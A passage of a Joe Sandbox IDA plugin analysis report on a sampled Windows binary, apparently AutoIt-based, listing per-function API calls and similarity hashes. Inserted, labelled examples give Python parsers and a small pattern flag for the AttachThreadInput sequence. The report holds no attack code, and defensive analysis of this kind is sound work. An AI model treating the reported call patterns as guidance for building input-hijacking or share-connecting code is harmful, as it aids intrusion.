• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
• Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
• Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
• Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
• Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
• Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
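The records above are the per-function output of the Joe Sandbox IDA plugin: each one lists the Win32 calls resolved in a function (direct calls, plus calls made by subcalls), the memory dump the function was lifted from, and the similarity identifiers (API ID, API String ID, opcode and instruction hashes) that Joe Sandbox uses to match functions across samples. Working through this layout by hand is slow, so the following is an added example, not part of this report and not Joe Sandbox code: a parser that turns records in this layout into structured data, an index from API name to call sites, and a simple co-occurrence flag. The two sample records are copied from the report text above with their Associated lines trimmed; the PATTERNS table and its label are this example's own assumption, not a Joe Sandbox signature.

```python
# Added example (not Joe Sandbox code): parser for the function records above.
# The PATTERNS table below is this example's own assumption.
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from the report, Associated lines trimmed.
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• API String ID: 2710830443-0
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                        # call-site address inside the dump
    subcall_of: int | None = None   # set for "Part of subcall function X" lines

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    image_base: int | None = None
    similarity: dict[str, str] = field(default_factory=dict)

    def api_names(self) -> set[str]:
        # Direct calls only: subcall lines describe callees, not this function.
        return {c.name for c in self.apis if c.subcall_of is None}

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_records(text: str) -> list[FunctionRecord]:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()    # drop bullets and extraction indent
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                     # every record opens with its API list
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
        elif section == "Memory Dump Source" and line.startswith("Source File:"):
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", line)
            cur.image_base = int(off.group(1), 16) if off else None
        elif section == "Similarity" and ":" in line:
            key, value = line.split(":", 1)
            cur.similarity[key.strip()] = value.strip()
    return records

# Assumed pattern table (this example's, not Joe Sandbox's): sets of direct calls
# whose co-occurrence in one function an analyst would want surfaced.
PATTERNS = {
    "attaches own input queue to a foreign window's thread":
        {"GetWindowThreadProcessId", "GetCurrentThreadId", "AttachThreadInput"},
}

def flag_records(records: list[FunctionRecord]) -> list[tuple[int, str]]:
    return [(i, label) for i, r in enumerate(records)
            for label, need in PATTERNS.items() if need <= r.api_names()]

def index_by_api(records: list[FunctionRecord]) -> dict[str, list[int]]:
    # API name -> call-site addresses, for "where is X called" questions.
    idx: dict[str, list[int]] = {}
    for r in records:
        for c in r.apis:
            if c.subcall_of is None:
                idx.setdefault(c.name, []).append(c.ref)
    return idx
```

Feed the whole report text (this section and the rest) to parse_records and the empty "APIs" lists, the nested subcall lines and the "Associated" dump lines are handled without special cases; the call-site addresses come back as integers relative to the dumped image (base 0x400000 here), so they can be compared directly with addresses from a disassembler.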
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
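The two function listings above share the same API ID (CapsDesktopDeviceReleaseWindow) and differ only in the second argument passed to GetDeviceCaps: 0000000C in the first, 00000074 in the second. Reading those out of a long report by hand is error-prone, so the following added example (not part of the Joe Sandbox report) parses the report's "APIs" line format into structured calls and names the GetDeviceCaps index using the documented wingdi.h constants (BITSPIXEL = 12, VREFRESH = 116, and a few others). The sample input is constructed from lines copied from the listings on this page; the address values are the ones the report shows, and "?" arguments are kept as unknowns rather than guessed.

```python
"""Parse Joe Sandbox per-function "APIs" listings into structured calls.

Line shapes handled (as printed in the report):
  • Name.MODULE ref: 0041ABCD
  • Name.MODULE(arg1,arg2,?), ref: 0041ABCD
    • Part of subcall function 0041AB00: Name.MODULE(...), ref: 0041ABCD
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied from the function listings in this report,
# including one nested "Part of subcall function" line.
SAMPLE = """\
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
"""

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# GetDeviceCaps index constants from wingdi.h (documented values).
DEVICE_CAPS = {
    8: "HORZRES", 10: "VERTRES", 12: "BITSPIXEL", 14: "PLANES",
    24: "NUMCOLORS", 88: "LOGPIXELSX", 90: "LOGPIXELSY", 116: "VREFRESH",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]      # None where the report prints '?'
    ref: int                       # call-site address from the dump
    parent: Optional[int] = None   # callee address on "Part of subcall" lines


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every API line in `text` as an ApiCall; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [_parse_arg(a) for a in raw.split(",")]
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), parent))
    return calls


def describe_device_caps(call: ApiCall) -> Optional[str]:
    """Name the index queried by a GetDeviceCaps call (its second argument)."""
    if call.name != "GetDeviceCaps" or len(call.args) < 2 or call.args[1] is None:
        return None
    return DEVICE_CAPS.get(call.args[1], f"index {call.args[1]}")


def device_caps_indices(calls: List[ApiCall]) -> List[Optional[str]]:
    return [describe_device_caps(c) for c in calls if c.name == "GetDeviceCaps"]


def api_sequence(calls: List[ApiCall], top_level_only: bool = True) -> List[str]:
    """API names in listing order; nested subcall lines are dropped by default."""
    return [c.name for c in calls if not (top_level_only and c.parent is not None)]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    print(" -> ".join(api_sequence(parsed)))
    print("GetDeviceCaps indices:", device_caps_indices(parsed))
```

Run over the whole report, `api_sequence` gives a compact per-function call order that can be compared across samples, while `describe_device_caps` turns the two listings above into a readable "BITSPIXEL then VREFRESH" display query.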
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
• Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 2652923123-3941886329
• Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
• Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
• Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
• Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
• API String ID: 2666721431-100911408
• Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
• Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
• Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
• Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
• Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
• Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
• Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
